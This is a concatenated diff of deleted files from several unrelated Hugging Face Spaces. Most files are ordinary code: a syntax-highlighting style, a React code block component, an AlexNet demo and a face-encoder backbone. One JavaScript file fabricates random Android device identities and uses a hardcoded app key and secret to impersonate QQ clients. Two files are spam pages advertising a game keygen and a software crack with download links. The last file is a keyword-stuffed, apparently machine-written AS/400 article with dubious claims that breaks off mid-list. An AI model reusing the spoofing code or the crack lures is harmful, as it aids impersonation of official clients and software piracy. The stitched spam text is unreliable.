'base00': '#657b83', - 'base0': '#839496', - 'base1': '#93a1a1', - 'base2': '#eee8d5', - 'base3': '#fdf6e3', - 'yellow': '#b58900', - 'orange': '#cb4b16', - 'red': '#dc322f', - 'magenta': '#d33682', - 'violet': '#6c71c4', - 'blue': '#268bd2', - 'cyan': '#2aa198', - 'green': '#859900', -} - -LIGHT_COLORS = { - 'base3': '#002b36', - 'base2': '#073642', - 'base1': '#586e75', - 'base0': '#657b83', - 'base00': '#839496', - 'base01': '#93a1a1', - 'base02': '#eee8d5', - 'base03': '#fdf6e3', - 'yellow': '#b58900', - 'orange': '#cb4b16', - 'red': '#dc322f', - 'magenta': '#d33682', - 'violet': '#6c71c4', - 'blue': '#268bd2', - 'cyan': '#2aa198', - 'green': '#859900', -} - - -class SolarizedDarkStyle(Style): - """ - The solarized style, dark. - """ - - styles = make_style(DARK_COLORS) - background_color = DARK_COLORS['base03'] - highlight_color = DARK_COLORS['base02'] - line_number_color = DARK_COLORS['base01'] - line_number_background_color = DARK_COLORS['base02'] - - -class SolarizedLightStyle(SolarizedDarkStyle): - """ - The solarized style, light. - """ - - styles = make_style(LIGHT_COLORS) - background_color = LIGHT_COLORS['base03'] - highlight_color = LIGHT_COLORS['base02'] - line_number_color = LIGHT_COLORS['base01'] - line_number_background_color = LIGHT_COLORS['base02'] diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/requests/__version__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/requests/__version__.py deleted file mode 100644 index 5063c3f8ee7980493efcc30c24f7e7582714aa81..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/requests/__version__.py +++ /dev/null @@ -1,14 +0,0 @@ -# .-. .-. .-. . . .-. .-. .-. .-. -# |( |- |.| | | |- `-. | `-. -# ' ' `-' `-`.`-' `-' `-' ' `-' - -__title__ = "requests" -__description__ = "Python HTTP for Humans." -__url__ = "https://requests.readthedocs.io" -__version__ = "2.31.0" -__build__ = 0x023100 -__author__ = "Kenneth Reitz" -__author_email__ = "me@kennethreitz.org" -__license__ = "Apache 2.0" -__copyright__ = "Copyright Kenneth Reitz" -__cake__ = "\u2728 \U0001f370 \u2728" diff --git a/spaces/pycoming/bingo/src/components/ui/codeblock.tsx b/spaces/pycoming/bingo/src/components/ui/codeblock.tsx deleted file mode 100644 index aabda4e3b59f4e36b6ab79feb19d8d18b70e881b..0000000000000000000000000000000000000000 --- a/spaces/pycoming/bingo/src/components/ui/codeblock.tsx +++ /dev/null @@ -1,142 +0,0 @@ -'use client' - -import { FC, memo } from 'react' -import { Prism as SyntaxHighlighter } from 'react-syntax-highlighter' -import { coldarkDark } from 'react-syntax-highlighter/dist/cjs/styles/prism' - -import { useCopyToClipboard } from '@/lib/hooks/use-copy-to-clipboard' -import { IconCheck, IconCopy, IconDownload } from '@/components/ui/icons' -import { Button } from '@/components/ui/button' - -interface Props { - language: string - value: string -} - -interface languageMap { - [key: string]: string | undefined -} - -export const programmingLanguages: languageMap = { - javascript: '.js', - python: '.py', - java: '.java', - c: '.c', - cpp: '.cpp', - 'c++': '.cpp', - 'c#': '.cs', - ruby: '.rb', - php: '.php', - swift: '.swift', - 'objective-c': '.m', - kotlin: '.kt', - typescript: '.ts', - go: '.go', - perl: '.pl', - rust: '.rs', - scala: '.scala', - haskell: '.hs', - lua: '.lua', - shell: '.sh', - sql: '.sql', - html: '.html', - css: '.css' - // add more file extensions here, make sure the key is same as language prop in CodeBlock.tsx component -} - -export const generateRandomString = (length: number, lowercase = false) => { - const chars = 'ABCDEFGHJKLMNPQRSTUVWXY3456789' // excluding similar looking characters like Z, 2, I, 1, O, 0 - let result = '' - for (let i = 0; i < length; i++) { - result += chars.charAt(Math.floor(Math.random() * chars.length)) - } - return lowercase ? result.toLowerCase() : result -} - -const CodeBlock: FC = memo(({ language, value }) => { - const { isCopied, copyToClipboard } = useCopyToClipboard({ timeout: 2000 }) - - const downloadAsFile = () => { - if (typeof window === 'undefined') { - return - } - const fileExtension = programmingLanguages[language] || '.file' - const suggestedFileName = `file-${generateRandomString( - 3, - true - )}${fileExtension}` - const fileName = window.prompt('Enter file name' || '', suggestedFileName) - - if (!fileName) { - // User pressed cancel on prompt. - return - } - - const blob = new Blob([value], { type: 'text/plain' }) - const url = URL.createObjectURL(blob) - const link = document.createElement('a') - link.download = fileName - link.href = url - link.style.display = 'none' - document.body.appendChild(link) - link.click() - document.body.removeChild(link) - URL.revokeObjectURL(url) - } - - const onCopy = () => { - if (isCopied) return - copyToClipboard(value) - } - - return ( -
      -
      - {language} -
      - - -
      -
      - - {value} - -
      - ) -}) -CodeBlock.displayName = 'CodeBlock' - -export { CodeBlock } diff --git a/spaces/pytorch/AlexNet/app.py b/spaces/pytorch/AlexNet/app.py deleted file mode 100644 index 7e6ac40eb1f289cad6ce51bb7c6bb20104fa51d1..0000000000000000000000000000000000000000 --- a/spaces/pytorch/AlexNet/app.py +++ /dev/null @@ -1,55 +0,0 @@ -import os -import torch -import gradio as gr -from PIL import Image -from torchvision import transforms - -torch.hub.download_url_to_file("https://github.com/pytorch/hub/raw/master/images/dog.jpg", "dog.jpg") - -model = torch.hub.load('pytorch/vision:v0.9.0', 'alexnet', pretrained=True) -model.eval() - -# Download ImageNet labels -os.system("wget https://raw.githubusercontent.com/pytorch/hub/master/imagenet_classes.txt") - -def inference(input_image): - - preprocess = transforms.Compose([ - transforms.Resize(256), - transforms.CenterCrop(224), - transforms.ToTensor(), - transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]), - ]) - input_tensor = preprocess(input_image) - input_batch = input_tensor.unsqueeze(0) # create a mini-batch as expected by the model - - # move the input and model to GPU for speed if available - if torch.cuda.is_available(): - input_batch = input_batch.to('cuda') - model.to('cuda') - - with torch.no_grad(): - output = model(input_batch) - # The output has unnormalized scores. To get probabilities, you can run a softmax on it. - probabilities = torch.nn.functional.softmax(output[0], dim=0) - # Read the categories - with open("imagenet_classes.txt", "r") as f: - categories = [s.strip() for s in f.readlines()] - # Show top categories per image - top5_prob, top5_catid = torch.topk(probabilities, 5) - result = {} - for i in range(top5_prob.size(0)): - result[categories[top5_catid[i]]] = top5_prob[i].item() - return result - -inputs = gr.inputs.Image(type='pil') -outputs = gr.outputs.Label(type="confidences",num_top_classes=5) - -title = "ALEXNET" -description = "Gradio demo for Alexnet, the 2012 ImageNet winner achieved a top-5 error of 15.3%, more than 10.8 percentage points lower than that of the runner up. To use it, simply upload your image, or click one of the examples to load them. Read more at the links below." -article = "

      One weird trick for parallelizing convolutional neural networks | Github Repo

      " - -examples = [ - ['dog.jpg'] -] -gr.Interface(inference, inputs, outputs, title=title, description=description, article=article, examples=examples, analytics_enabled=False).launch() \ No newline at end of file diff --git a/spaces/qingjiu11/QQmm/devices/device_8958.js b/spaces/qingjiu11/QQmm/devices/device_8958.js deleted file mode 100644 index 455ddb0108b70276949e6539926481590a98e0d9..0000000000000000000000000000000000000000 --- a/spaces/qingjiu11/QQmm/devices/device_8958.js +++ /dev/null @@ -1,344 +0,0 @@ -"use strict"; -var __importDefault = (this && this.__importDefault) || function (mod) { - return (mod && mod.__esModule) ? mod : { "default": mod }; -}; -Object.defineProperty(exports, "__esModule", { value: true }); -exports.getApkInfo = exports.Platform = exports.Device = exports.generateFullDevice = exports.generateShortDevice = void 0; -const crypto_1 = require("crypto"); -const constants_1 = require("./constants"); -const axios_1 = __importDefault(require("axios")); -const algo_1 = require("./algo"); -function generateImei() { - let imei = `86${(0, constants_1.randomString)(12, '0123456789')}`; - function calcSP(imei) { - let sum = 0; - for (let i = 0; i < imei.length; ++i) { - if (i % 2) { - let j = parseInt(imei[i]) * 2; - sum += j % 10 + Math.floor(j / 10); - } - else { - sum += parseInt(imei[i]); - } - } - return (100 - sum) % 10; - } - return imei + calcSP(imei); -} -/** 生成短设备信息 */ -function generateShortDevice() { - const randstr = (length, num = false) => { - const map = num ? '0123456789' : '0123456789abcdef'; - return (0, constants_1.randomString)(length, map); - }; - return { - "--begin--": "该设备为随机生成,丢失后不能得到原先配置", - product: `ILPP-${randstr(5).toUpperCase()}`, - device: `${randstr(5).toUpperCase()}`, - board: `${randstr(5).toUpperCase()}`, - brand: `${randstr(4).toUpperCase()}`, - model: `ICQQ ${randstr(4).toUpperCase()}`, - wifi_ssid: `HUAWEI-${randstr(7)}`, - bootloader: `U-boot`, - android_id: `IL.${randstr(7, true)}.${randstr(4, true)}`, - boot_id: `${randstr(8)}-${randstr(4)}-${randstr(4)}-${randstr(4)}-${randstr(12)}`, - proc_version: `Linux version 5.10.101-android12-${randstr(8)}`, - mac_address: `2D:${randstr(2).toUpperCase()}:${randstr(2).toUpperCase()}:${randstr(2).toUpperCase()}:${randstr(2).toUpperCase()}:${randstr(2).toUpperCase()}`, - ip_address: `192.168.${randstr(2, true)}.${randstr(2, true)}`, - imei: `${generateImei()}`, - incremental: `${randstr(10, true).toUpperCase()}`, - "--end--": "修改后可能需要重新验证设备。" - }; -} -exports.generateShortDevice = generateShortDevice; -/** 生成完整设备信息 */ -function generateFullDevice(apk, d) { - if (!d) - d = generateShortDevice(); - return { - display: d.android_id, - product: d.product, - device: d.device, - board: d.board, - brand: d.brand, - model: d.model, - bootloader: d.bootloader, - fingerprint: `${d.brand}/${d.product}/${d.device}:10/${d.android_id}/${d.incremental}:user/release-keys`, - boot_id: d.boot_id, - proc_version: d.proc_version, - baseband: "", - sim: "T-Mobile", - os_type: "android", - mac_address: d.mac_address, - ip_address: d.ip_address, - wifi_bssid: d.mac_address, - wifi_ssid: d.wifi_ssid, - imei: d.imei, - android_id: (0, constants_1.md5)(d.android_id).toString("hex"), - apn: "wifi", - version: { - incremental: d.incremental, - release: "10", - codename: "REL", - sdk: 29, - }, - imsi: (0, crypto_1.randomBytes)(16), - guid: (0, constants_1.md5)(Buffer.concat([Buffer.from(d.imei), Buffer.from(d.mac_address)])), - }; -} -exports.generateFullDevice = generateFullDevice; -class Device { - constructor(apk, d) { - this.apk = apk; - this.secret = 'ZdJqM15EeO2zWc08'; - this.publicKey = `-----BEGIN PUBLIC KEY----- -MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDEIxgwoutfwoJxcGQeedgP7FG9 -qaIuS0qzfR8gWkrkTZKM2iWHn2ajQpBRZjMSoSf6+KJGvar2ORhBfpDXyVtZCKpq -LQ+FLkpncClKVIrBwv6PHyUvuCb0rIarmgDnzkfQAqVufEtR64iazGDKatvJ9y6B -9NMbHddGSAUmRTCrHQIDAQAB ------END PUBLIC KEY-----`; - if (!d) - d = generateShortDevice(); - Object.assign(this, generateFullDevice(apk, d)); - } - async getQIMEI() { - if (this.apk.app_key === "") { - return; - } - const k = (0, constants_1.randomString)(16); - const key = (0, algo_1.encryptPKCS1)(this.publicKey, k); - const time = Date.now(); - const nonce = (0, constants_1.randomString)(16); - const payload = this.genRandomPayloadByDevice(); - const params = (0, algo_1.aesEncrypt)(JSON.stringify(payload), k).toString('base64'); - try { - const { data } = await axios_1.default.post("https://snowflake.qq.com/ola/android", { - key, - params, - time, nonce, - sign: (0, constants_1.md5)(key + params + time + nonce + this.secret).toString("hex"), - extra: '' - }, { - headers: { - 'User-Agent': `Dalvik/2.1.0 (Linux; U; Android ${this.version.release}; PCRT00 Build/N2G48H)`, - 'Content-Type': "application/json" - } - }); - if (data?.code !== 0) { - return; - } - const { q16, q36 } = JSON.parse((0, algo_1.aesDecrypt)(data.data, k)); - this.qImei16 = q16; - this.qImei36 = q36; - } - catch { - } - } - genRandomPayloadByDevice() { - const fixedRand = (max = 1, min = 0) => { - if (max < min) - [max, min] = [min, max]; - const diff = max - min; - return Math.floor(Math.random() * diff) + min; - }; - const reserved = { - "harmony": "0", - "clone": Math.random() > 0.5 ? "1" : "0", - "containe": "", - "oz": "", - "oo": "", - "kelong": Math.random() > 0.5 ? "1" : "0", - "uptimes": (0, constants_1.formatTime)(new Date()), - "multiUser": Math.random() > 0.5 ? "1" : "0", - "bod": this.board, - "brd": this.brand, - "dv": this.device, - "firstLevel": "", - "manufact": this.brand, - "name": this.model, - "host": "se.infra", - "kernel": this.fingerprint - }; - const timestamp = Date.now(); - this.mtime = this.mtime || Date.now(); - const mtime1 = new Date(this.mtime || Date.now()); - const dateFormat = (fmt, time = Date.now()) => (0, constants_1.formatTime)(time, fmt); - const mtimeStr1 = dateFormat("YYYY-mm-ddHHMMSS", mtime1) + "." + this.imei.slice(2, 11); - const mtime2 = new Date(this.mtime - parseInt(this.imei.slice(2, 4))); - const mtimeStr2 = dateFormat("YYYY-mm-ddHHMMSS", mtime2) + "." + this.imei.slice(5, 14); - let beaconIdArr = [ - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - mtimeStr1, - '0000000000000000', - (0, constants_1.md5)(this.android_id + this.imei).toString("hex").slice(0, 16), - ...new Array(4).fill(false).map((_) => fixedRand(10000000, 1000000)), - this.boot_id, - '1', - fixedRand(5, 0), - fixedRand(5, 0), - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - fixedRand(5, 0), - fixedRand(100, 10), - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - fixedRand(50000, 10000), - fixedRand(100, 10), - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - mtimeStr2, - fixedRand(10000, 1000), - fixedRand(5, 0), - `${dateFormat("YYYY-mm-ddHHMMSS")}.${String(((10 + parseInt(this.imei.slice(5, 7))) % 100)).padStart(2, "0")}0000000`, - `${dateFormat("YYYY-mm-ddHHMMSS")}.${String(((11 + parseInt(this.imei.slice(5, 7))) % 100)).padStart(2, "0")}0000000`, - fixedRand(10000, 1000), - fixedRand(100, 10), - `${dateFormat("YYYY-mm-ddHHMMSS")}.${String(((11 + parseInt(this.imei.slice(5, 7))) % 100)).padStart(2, "0")}0000000`, - `${dateFormat("YYYY-mm-ddHHMMSS")}.${String(((11 + parseInt(this.imei.slice(5, 7))) % 100)).padStart(2, "0")}0000000`, - fixedRand(10000, 1000), - fixedRand(5, 0), - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - fixedRand(5, 0), - fixedRand(100, 10), - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - fixedRand(5, 0), - fixedRand(5, 0), - ].map((str, idx) => `k${idx + 1}:${str}`); - return { - "androidId": this.android_id, - "platformId": 1, - "appKey": this.apk.app_key, - "appVersion": this.apk.version, - "beaconIdSrc": beaconIdArr.join(';'), - "brand": this.brand, - "channelId": "2017", - "cid": "", - "imei": this.imei, - "imsi": this.imsi.toString("hex"), - "mac": this.mac_address, - "model": this.model, - "networkType": "unknown", - "oaid": "", - "osVersion": `Android ${this.version.release},level ${this.version.sdk}`, - "qimei": "", - "qimei36": "", - "sdkVersion": "1.2.13.6", - "targetSdkVersion": "26", - "audit": "", - "userId": "{}", - "packageId": this.apk.id, - "deviceType": this.display, - "sdkName": "", - "reserved": JSON.stringify(reserved), - }; - } -} -exports.Device = Device; -/** 支持的登录设备平台 */ -var Platform; -(function (Platform) { - Platform[Platform["Android"] = 1] = "Android"; - Platform[Platform["aPad"] = 2] = "aPad"; - Platform[Platform["Watch"] = 3] = "Watch"; - Platform[Platform["iMac"] = 4] = "iMac"; - Platform[Platform["iPad"] = 5] = "iPad"; - Platform[Platform["Tim"] = 6] = "Tim"; -})(Platform = exports.Platform || (exports.Platform = {})); -const mobile = { - id: "com.tencent.mobileqq", - app_key: '0S200MNJT807V3GE', - name: "A8.9.58.11175", - version: "8.9.58.11175", - ver: "8.9.58", - sign: Buffer.from('A6 B7 45 BF 24 A2 C2 77 52 77 16 F6 F3 6E B6 8D'.split(' ').map(s => parseInt(s, 16))), - buildtime: 1684467300, - appid: 16, - subid: 537163194, - bitmap: 150470524, - main_sig_map: 16724722, - sub_sig_map: 0x10400, - sdkver: "6.0.0.2545", - display: "Android_8.9.58", - qua: 'V1_AND_SQ_8.9.58_4108_YYB_D', - ssover: 20, -}; -const tim = { - id: "com.tencent.tim", - app_key: '0S200MNJT807V3GE', - name: "A3.5.1.3168", - version: "3.5.1.3168", - ver: "3.5.1", - sign: Buffer.from('775e696d09856872fdd8ab4f3f06b1e0', 'hex'), - buildtime: 1630062176, - appid: 16, - subid: 537150355, - bitmap: 150470524, - main_sig_map: 16724722, - sub_sig_map: 0x10400, - sdkver: "6.0.0.2484", - display: "Tim", - qua: "V1_AND_SQ_8.3.9_351_TIM_D", - ssover: 18, -}; -const watch = { - id: "com.tencent.qqlite", - app_key: '0S200MNJT807V3GE', - name: "A2.0.8", - version: "2.0.8", - ver: "2.0.8", - sign: Buffer.from('A6 B7 45 BF 24 A2 C2 77 52 77 16 F6 F3 6E B6 8D'.split(' ').map(s => parseInt(s, 16))), - buildtime: 1559564731, - appid: 16, - subid: 537065138, - bitmap: 16252796, - main_sig_map: 16724722, - sub_sig_map: 0x10400, - sdkver: "6.0.0.2365", - display: "Watch", - qua: '', - ssover: 5 -}; -const hd = { - id: "com.tencent.minihd.qq", - app_key: '0S200MNJT807V3GE', - name: "A5.9.3.3468", - version: "5.9.3.3468", - ver: "5.9.3", - sign: Buffer.from('AA 39 78 F4 1F D9 6F F9 91 4A 66 9E 18 64 74 C7'.split(' ').map(s => parseInt(s, 16))), - buildtime: 1637427966, - appid: 16, - subid: 537128930, - bitmap: 150470524, - main_sig_map: 1970400, - sub_sig_map: 66560, - sdkver: "6.0.0.2433", - display: "iMac", - qua: '', - ssover: 12 -}; -const apklist = { - [Platform.Android]: mobile, - [Platform.Tim]: tim, - [Platform.aPad]: { - ...mobile, - subid: 537163242, - display: 'aPad_8.9.58' - }, - [Platform.Watch]: watch, - [Platform.iMac]: { ...hd }, - [Platform.iPad]: { - ...mobile, - subid: 537155074, - sign: hd.sign, - name: '8.9.50.611', - ver: '8.9.50', - sdkver: '6.0.0.2535', - qua: 'V1_AND_SQ_8.9.50_3898_YYB_D', - display: 'iPad' - }, -}; -function getApkInfo(p) { - return apklist[p] || apklist[Platform.Android]; -} -exports.getApkInfo = getApkInfo; diff --git a/spaces/quidiaMuxgu/Expedit-SAM/Command And Conquer 4 Tiberian Twilight !!TOP!! Keygen Generator 136.md b/spaces/quidiaMuxgu/Expedit-SAM/Command And Conquer 4 Tiberian Twilight !!TOP!! Keygen Generator 136.md deleted file mode 100644 index 104fbea9323933e4dc30a141558bcefedf6f8f0a..0000000000000000000000000000000000000000 --- a/spaces/quidiaMuxgu/Expedit-SAM/Command And Conquer 4 Tiberian Twilight !!TOP!! Keygen Generator 136.md +++ /dev/null @@ -1,17 +0,0 @@ -

      command and conquer 4 tiberian twilight keygen generator 136


      DOWNLOADhttps://geags.com/2uCsCF



      - -This is the first true key generator in Internet October 05, 2014 ... /eb/ 33/17/91/8f/command-and-conquer-4-tiberian-twilight-keygen-generator-136.html ... Tiberian Twilight Keygen Generator ... -Tiberian Twilight Keygen Generator ... -Generator,... -Tiberian Twilight -Tiberian Twilight Keygen Generator Rar. -Tiberian Twilight Keygen Generator Rar ... -Key generator for the game Tiberian Twilight. -Tiberian Twilight Keygen... -Tiberian Twilight Keygen Generator . -Download key generator for game of warfare for free from file sharing -Oct 17 2013 Key generator for the Tiberian Twilight game. -DOWNLOAD ... 8a78ff9644
      -
      -
      -

      diff --git a/spaces/quidiaMuxgu/Expedit-SAM/GSA Search Engine Ranker 13.89 Crack VERIFIED.md b/spaces/quidiaMuxgu/Expedit-SAM/GSA Search Engine Ranker 13.89 Crack VERIFIED.md deleted file mode 100644 index aeb504114363771657fc1673c749cb3f10e8b08b..0000000000000000000000000000000000000000 --- a/spaces/quidiaMuxgu/Expedit-SAM/GSA Search Engine Ranker 13.89 Crack VERIFIED.md +++ /dev/null @@ -1,6 +0,0 @@ -

      GSA Search Engine Ranker 13.89 Crack


      Download 🌟 https://geags.com/2uCs7n



      - -All you need to know about Gsa Search Engine Ranker Crack Image gallery. ... #15. GSA Search Engine Ranker 13.89 Crack - Wright Family Archive pic. 4d29de3e1b
      -
      -
      -

      diff --git a/spaces/radames/UserControllableLT-Latent-Transformer/interface/pixel2style2pixel/models/encoders/model_irse.py b/spaces/radames/UserControllableLT-Latent-Transformer/interface/pixel2style2pixel/models/encoders/model_irse.py deleted file mode 100644 index bc41ace0ba04cf4285c283a28e6c36113a18e6d6..0000000000000000000000000000000000000000 --- a/spaces/radames/UserControllableLT-Latent-Transformer/interface/pixel2style2pixel/models/encoders/model_irse.py +++ /dev/null @@ -1,84 +0,0 @@ -from torch.nn import Linear, Conv2d, BatchNorm1d, BatchNorm2d, PReLU, Dropout, Sequential, Module -from models.encoders.helpers import get_blocks, Flatten, bottleneck_IR, bottleneck_IR_SE, l2_norm - -""" -Modified Backbone implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch) -""" - - -class Backbone(Module): - def __init__(self, input_size, num_layers, mode='ir', drop_ratio=0.4, affine=True): - super(Backbone, self).__init__() - assert input_size in [112, 224], "input_size should be 112 or 224" - assert num_layers in [50, 100, 152], "num_layers should be 50, 100 or 152" - assert mode in ['ir', 'ir_se'], "mode should be ir or ir_se" - blocks = get_blocks(num_layers) - if mode == 'ir': - unit_module = bottleneck_IR - elif mode == 'ir_se': - unit_module = bottleneck_IR_SE - self.input_layer = Sequential(Conv2d(3, 64, (3, 3), 1, 1, bias=False), - BatchNorm2d(64), - PReLU(64)) - if input_size == 112: - self.output_layer = Sequential(BatchNorm2d(512), - Dropout(drop_ratio), - Flatten(), - Linear(512 * 7 * 7, 512), - BatchNorm1d(512, affine=affine)) - else: - self.output_layer = Sequential(BatchNorm2d(512), - Dropout(drop_ratio), - Flatten(), - Linear(512 * 14 * 14, 512), - BatchNorm1d(512, affine=affine)) - - modules = [] - for block in blocks: - for bottleneck in block: - modules.append(unit_module(bottleneck.in_channel, - bottleneck.depth, - bottleneck.stride)) - self.body = Sequential(*modules) - - def forward(self, x): - x = self.input_layer(x) - x = self.body(x) - x = self.output_layer(x) - return l2_norm(x) - - -def IR_50(input_size): - """Constructs a ir-50 model.""" - model = Backbone(input_size, num_layers=50, mode='ir', drop_ratio=0.4, affine=False) - return model - - -def IR_101(input_size): - """Constructs a ir-101 model.""" - model = Backbone(input_size, num_layers=100, mode='ir', drop_ratio=0.4, affine=False) - return model - - -def IR_152(input_size): - """Constructs a ir-152 model.""" - model = Backbone(input_size, num_layers=152, mode='ir', drop_ratio=0.4, affine=False) - return model - - -def IR_SE_50(input_size): - """Constructs a ir_se-50 model.""" - model = Backbone(input_size, num_layers=50, mode='ir_se', drop_ratio=0.4, affine=False) - return model - - -def IR_SE_101(input_size): - """Constructs a ir_se-101 model.""" - model = Backbone(input_size, num_layers=100, mode='ir_se', drop_ratio=0.4, affine=False) - return model - - -def IR_SE_152(input_size): - """Constructs a ir_se-152 model.""" - model = Backbone(input_size, num_layers=152, mode='ir_se', drop_ratio=0.4, affine=False) - return model diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Big Dummys Guide To The As400 PDF How to Master the Application System400 Operating System.md b/spaces/raedeXanto/academic-chatgpt-beta/Big Dummys Guide To The As400 PDF How to Master the Application System400 Operating System.md deleted file mode 100644 index 8f7a0273affeed8add1bda19566e529c951846c2..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Big Dummys Guide To The As400 PDF How to Master the Application System400 Operating System.md +++ /dev/null @@ -1,196 +0,0 @@ -
      -

      Big Dummy's Guide to the AS/400 PDF

      -

      If you are looking for a comprehensive and easy-to-follow guide on how to use the AS/400, you have come to the right place. In this article, you will learn what the AS/400 is, how to get started with it, and where to find more resources on it. Whether you are a beginner or an expert, this guide will help you master the AS/400 in no time.

      -

      What is the AS/400?

      -

      The AS/400, also known as the IBM iSeries or System i, is a family of mid-range business computers that was introduced by IBM in 1988. The AS/400 is designed to run a variety of applications, such as accounting, inventory management, payroll, e-commerce, and more. The AS/400 is known for its reliability, security, scalability, and compatibility with other systems.

      -

      bigdummysguidetotheas400PDF


      Download Zip ○○○ https://tinourl.com/2uL2yx



      -

      A brief history of the AS/400

      -

      The AS/400 was originally developed as a successor to the IBM System/38 and System/36, which were popular in the 1970s and 1980s. The AS/400 inherited many features from these systems, such as the single-level storage model, the integrated database, and the object-oriented architecture. The AS/400 also introduced new features, such as a graphical user interface, a 64-bit processor, and a client-server model.

      -

      Over the years, IBM has released several versions and models of the AS/400, each with improved performance and functionality. The latest version of the AS/400 is called IBM i 7.4, which was released in 2019. The current models of the AS/400 are called IBM Power Systems, which can run multiple operating systems, including IBM i, AIX, and Linux.

      -

      The main features of the AS/400

      -

      The AS/400 has many features that make it a powerful and versatile system for business applications. Some of these features are:

      -
        -
      • The single-level storage model: This means that the AS/400 treats all data as objects, regardless of their type or location. This simplifies data management and access, as well as enhances security and integrity.
      • -
      • The integrated database: This means that the AS/400 has a built-in relational database management system (DBMS) that supports SQL and other query languages. This eliminates the need for external DBMS software and allows for fast and efficient data processing.
      • -
      • The object-oriented architecture: This means that the AS/400 organizes all data and programs into objects that have attributes and methods. This enables modularity, reusability, inheritance, and polymorphism in programming.
      • -
      • The graphical user interface: This means that the AS/400 provides a user-friendly interface that allows users to interact with the system using windows, menus, icons, and mouse clicks. This improves usability and productivity.
      • -
      • The client-server model: This means that the AS/400 can act as both a server and a client in a network environment. This allows for distributed computing, data sharing, remote access, and web services.
      • -
      -

      The benefits of using the AS/400

      -

      The AS/400 has many benefits that make it a desirable system for business applications. Some of these benefits are:

      -
        -
      • The reliability: The AS/400 is known for its high availability and fault tolerance. It can handle heavy workloads without crashing or slowing down. It also has built-in backup and recovery features that prevent data loss.
      • -
      • The security: The AS/400 has multiple layers of security that protect data and programs from unauthorized access or modification. It also supports encryption, authentication, auditing, and firewall functions.
      • -
      • The scalability: The AS/400 can easily adapt to changing business needs by adding or removing hardware or software components. It also supports virtualization and cloud computing technologies that allow for flexible resource allocation.
      • -
      • The compatibility: The AS/400 can interoperate with other systems and platforms using standard protocols and formats. It also supports legacy applications and data formats that were developed for older versions of the system.
      • -
      -

      How to get started with the AS/400

      -

      If you want to learn how to use the AS/400, you will need some basic hardware and software requirements. You will also need to know some basic commands and operations of the system. Finally, you will need to familiarize yourself with some common tasks and functions of the system.

      -

      The hardware and software requirements for the AS/400

      -

      To use the AS/400, you will need:

      -
        -
      • An IBM Power System server: This is where the IBM i operating system and your applications will run. You can choose from different models depending on your budget and performance needs.
      • -
      • An IBM i Access Client Solutions (ACS) software: This is a program that allows you to connect to your server from your PC or mobile device. You can use it to perform various tasks on your server, such as managing files, running queries, debugging programs, etc.
      • -
      • An internet connection: This is required for downloading updates, accessing online resources, or connecting to other servers.
      • -
      -

      The basic commands and operations of the AS/400

      -

      To interact with your server using ACS software , you will need to know some basic commands and operations of IBM i . Some of these are:

      -
        -
      • The sign-on screen: This is where you enter your user name and password to log on to your server . You can also specify your initial menu , library list , job description , etc . here .
      • -
      • The command line: This is where you enter commands to perform various tasks on your server . You can access it by pressing F6 on any menu screen . You can also use function keys to display help , prompt , or exit options .
      • -
      • The menu screen: This is where you select options to perform various tasks on your server . You can access it by entering GO followed by a menu name on the command line . You can also use function keys to display help , prompt , or exit options .
      • -
      • The work with screen: This is where you view , select , or manipulate objects on your server . You can access it by entering WRK followed by an object type on the command line . You can also use function keys to display help , prompt , or exit options .
      • -
      • The display screen: This is where you view information about objects on your server . You can access it by entering DSP followed by an object type on the command line . You can also use function keys to display help , prompt , or exit options .
      • -
      -

      The common tasks and functions of IBM i

      -

      Some of the common tasks and functions that you can perform on IBM i are:

      -

      big dummy's guide to the as400 pdf download
      -big dummy's guide to the as400 pdf free
      -big dummy's guide to the as400 ebook
      -big dummy's guide to the as400 book
      -big dummy's guide to the as400 online
      -big dummy's guide to the ibm system i pdf
      -big dummy's guide to the ibm system i ebook
      -big dummy's guide to the ibm system i book
      -big dummy's guide to the ibm system i online
      -as400 for dummies pdf download
      -as400 for dummies pdf free
      -as400 for dummies ebook
      -as400 for dummies book
      -as400 for dummies online
      -as400 tutorial pdf download
      -as400 tutorial pdf free
      -as400 tutorial ebook
      -as400 tutorial book
      -as400 tutorial online
      -os/400 operating system handbook pdf
      -os/400 operating system handbook ebook
      -os/400 operating system handbook book
      -os/400 operating system handbook online
      -os/400 commands cheat sheet pdf
      -os/400 commands cheat sheet ebook
      -os/400 commands cheat sheet book
      -os/400 commands cheat sheet online
      -os/400 file management pdf
      -os/400 file management ebook
      -os/400 file management book
      -os/400 file management online
      -os/400 online help pdf
      -os/400 online help ebook
      -os/400 online help book
      -os/400 online help online
      -os/400 program development manager pdf
      -os/400 program development manager ebook
      -os/400 program development manager book
      -os/400 program development manager online
      -ibm system i introduction pdf
      -ibm system i introduction ebook
